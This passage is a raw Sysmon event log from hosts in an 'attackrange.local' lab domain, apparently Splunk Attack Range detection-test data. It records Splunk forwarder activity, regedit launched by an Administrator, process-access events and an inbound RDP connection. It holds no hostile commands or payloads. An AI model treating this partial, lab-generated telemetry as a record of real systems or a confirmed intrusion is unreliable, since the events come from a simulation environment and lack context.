Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.419{466BC892-F6B4-60EB-A57D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:50.222{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57374-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:53.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E2D63160AD0161CBFD4B8CA133B82C,SHA256=132920391233F5CC7E8AC255EE4F0B180940BD7E91D3C192923D051F4EBF3A0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:46.112{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57375-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001052316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:45.790{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51151-false10.0.1.12-8000- 
10341000x80000000000000001052315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.798{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.798{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.782{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.782{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.730{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.730{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.730{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B5-60EB-AA7D-00000000CF01}8280C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.683{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.683{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-AA7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.683{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B5-60EB-AA7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.656{466BC892-F6B5-60EB-AA7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.630{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.630{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.599{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CDEA7DAAD88E7A1BE2EB03AB3B10F93,SHA256=D8FE77D1B91496353B0AFBFEC87D6FB2DD715439AF5E62DB53C592424D725972,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:52.146{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-53376-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:53.590{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=405F63C43620F942F889F7068F324FD8,SHA256=D434A0FEC8E1EFDB29A4684FC2987B46C90BE75036D5A1B38EEF15B84402CC1F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:53.590{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FB7C69E404B43F5E198F42171A9F90C,SHA256=96845B953152D10F83632522F0CA4EE12D22FA1399EC6590115D2F99CE0E100B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.502{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.488{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.488{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.488{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+3c57|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.483{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXE"C:\Windows\regedit.exe" C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-F6B5-60EB-0076-080500000000}0x50876003HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.488{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
